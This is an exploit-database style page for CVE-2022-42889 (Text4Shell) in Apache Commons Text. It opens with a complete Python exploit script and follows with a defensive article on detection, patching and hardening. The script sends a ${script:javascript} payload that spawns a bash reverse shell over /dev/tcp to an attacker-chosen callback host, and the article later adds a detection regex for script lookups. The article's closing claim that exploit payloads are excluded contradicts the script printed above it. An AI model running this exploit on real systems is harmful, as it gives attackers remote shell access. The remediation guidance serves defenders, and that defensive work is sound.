Apache Commons Text 1.10.0 - Remote Code Execution

Exploit Author: Arjun Chaudhary Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2025-04-18

# Exploit Title: Apache Commons Text  1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.

#!/usr/bin/env python3

import urllib.parse
import http.client
import sys

def usage():
    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
    sys.exit(1)

if len(sys.argv) != 4:
    usage()

target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]

raw_payload = (
    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)


encoded_payload = urllib.parse.quote(raw_payload)


path = f"/?data={encoded_payload}" # modify the parameter according to your target 

print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")


conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
    "Host": target_ip,
    "Content-Type": "application/json",
    "Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()

Apache Commons Text 1.10.0 — Understanding CVE-2022-42889 (Text4Shell) and Safe Remediation

Executive summary

CVE-2022-42889 (commonly referenced as "Text4Shell") is a high-severity vulnerability in Apache Commons Text that allows untrusted input to be interpreted as script lookups during string interpolation, which can lead to remote code execution (RCE) in affected applications. The canonical fix is to upgrade to commons-text version 1.10.0 or later. This article explains the vulnerability at a safe, non-actionable level, shows how to detect and mitigate exposure in applications, and outlines best practices for defense-in-depth.

What the vulnerability is — high-level technical root cause

Commons Text provides powerful interpolation features that allow values to be looked up and replaced inside strings using a variety of lookup mechanisms. Some lookups are capable of invoking scripting engines (for example, via a "script" lookup). When untrusted data flows into interpolation contexts and the application allows script-based lookups, an attacker can inject expressions that the library will evaluate, potentially executing arbitrary code in the hosting JVM.

The core problem is unsafe evaluation of untrusted input during interpolation. The vulnerability is not limited to GET parameters; any input that an application passes into commons-text interpolation (POST bodies, headers, configuration inputs, etc.) can be an entry vector.

Scope and affected versions

Affected: Apache Commons Text versions prior to 1.10.0 (versions that include script-based lookups enabled by default or reachable through typical APIs).
Fixed in: Commons Text 1.10.0 (upgrade recommended).
Impact: Remote Code Execution in applications that perform interpolation on attacker-controlled input without proper restrictions.

Safe detection and inventory (how to find potential exposure)

Before applying changes, inventory where commons-text is used and whether inputs are passed to interpolation APIs. The following safe commands help locate dependencies and suspect code paths without demonstrating exploit payloads.

# Maven: show dependency tree and locate commons-text usage
mvn dependency:tree -Dincludes=org.apache.commons:commons-text

This command prints the dependency tree for Maven projects and highlights any usage of org.apache.commons:commons-text. Use it to identify modules that need review or upgrading.

# Gradle: locate occurrences in Gradle projects
./gradlew dependencies --configuration runtimeClasspath | grep -i "commons-text"

This Gradle command helps find commons-text artifacts on the runtime classpath.

# Search source code for interpolation usage (safe, low-noise)
grep -R --include="*.java" -n "StringSubstitutor" .
grep -R --include="*.java" -n "StringLookup" .

Look for direct uses of commons-text interpolation classes such as StringSubstitutor and StringLookup. These call sites are where untrusted input may be passed for interpolation.

Hunting for suspicious runtime input patterns

You can create detection rules to surface suspicious interpolation syntax in logs, request bodies or telemetry. Below is a safe, generic regex you can use in IDS/WAF or log-search systems to flag potential uses of script-style lookups. This is for detection only — do not use the regex as an exploit payload.

# Example regex to detect interpolation-based lookups in text (safe, for detection)
\$\{\s*(?:script|javascript|groovy|js)\s*:
\end{code>

Explanation: this pattern matches the typical prefix used for script-based lookups (for example, "${script:...}") while intentionally avoiding full exploit payloads. Tune it to reduce false positives in your environment.

Mitigation and remediation steps (priority actions)

Immediate: Determine if your application uses commons-text and whether untrusted input reaches interpolation APIs.
Primary fix: Upgrade commons-text to version 1.10.0 or later. This is the recommended and supported remediation.
Compensating controls (if you cannot upgrade immediately):
- Remove or restrict use of script-based lookups in your code by using only safe, explicitly configured lookups.
- Apply network egress restrictions so that application processes cannot reach attacker-controlled callback hosts from the runtime environment.
- Run applications with least privilege and non-root accounts, and restrict the set of native commands available in containers.
- Use WAF/IDS rules to block known suspicious interpolation patterns (as detection + temporary mitigation).
Long-term: Adopt dependency scanning/automation (SBOM, SCA tools) and secure coding practices to prevent similar issues.

How to upgrade safely (example: Maven)

<dependency>
  <groupId>org.apache.commons</groupId>
  <artifactId>commons-text</artifactId>
  <version>1.10.0</version>
</dependency>

Explanation: Replace existing commons-text dependency versions in your project's build descriptor (Maven POM shown above) with 1.10.0 or a later stable release. After updating, run your test suite and perform an integration test to ensure there are no compatibility issues.

Safe code-level hardening strategies

Avoid evaluating untrusted input with powerful features. If you need interpolation, prefer simple map-based lookups with explicit whitelists rather than global or script lookups.
Implement input validation and whitelisting for any values that will be interpolated into templates or configuration strings.
Prefer non-evaluative libraries for simple templating tasks, or use vetted templating engines that explicitly separate data and code execution.

// Conceptual example (safe pattern): use a fixed map of allowed values for replacements
Map<String, String> safeValues = Map.of("appName", "MyApp", "env", "prod");
// Use a simple replace strategy (do not expose scripting lookups)
String result = input.replace("${appName}", safeValues.get("appName"))
                     .replace("${env}", safeValues.get("env"));

Explanation: This is a conceptual illustration showing explicit replacement from a fixed, trusted map rather than enabling generic lookups that can invoke scripting or external resources. This approach limits interpolation to a known set of keys and values.

Operational and network defenses

Implement egress filtering so application hosts cannot initiate arbitrary outbound connections to attacker-controlled infrastructure.
Run applications inside hardened containers or sandboxes with restricted capabilities.
Log and alert on suspicious interpolation syntax in incoming requests; correlate with anomalous outbound connections or process executions.

Testing and validation

After remediation (especially after upgrading), validate the fix using non-destructive tests:

Unit and integration tests that exercise interpolation code paths with both benign and edge-case inputs.
Static analysis and dependency scans to ensure no residual vulnerable versions remain.
Runtime monitoring for unexpected outbound connections or process executions originating from application processes.

Responsible disclosure, monitoring, and incident response

If you determine your environment was exploited, follow your incident response process: isolate affected hosts, capture forensic artifacts, revoke credentials if necessary, and engage appropriate responders. For any new or rediscovered vulnerabilities, coordinate disclosure with the vendor and follow responsible disclosure best practices.

References and further reading

Apache Commons Text project: https://commons.apache.org/proper/commons-text/
CVE-2022-42889 — public advisories and vendor guidance (refer to official CVE and vendor pages for full details)
Software composition analysis (SCA) and dependency management best practices

Final notes (ethical and safety reminder)

The objective of this article is defensive: to inform engineers, defenders, and risk owners how the issue works at a non-actionable level, how to find and remediate exposures, and how to harden systems. Public exploit recipes or proof-of-concept payloads are intentionally excluded because distributing exploit-capable content increases the risk of harm. If you are responsible for a production system using commons-text, prioritize inventory, patching, and the mitigations described above.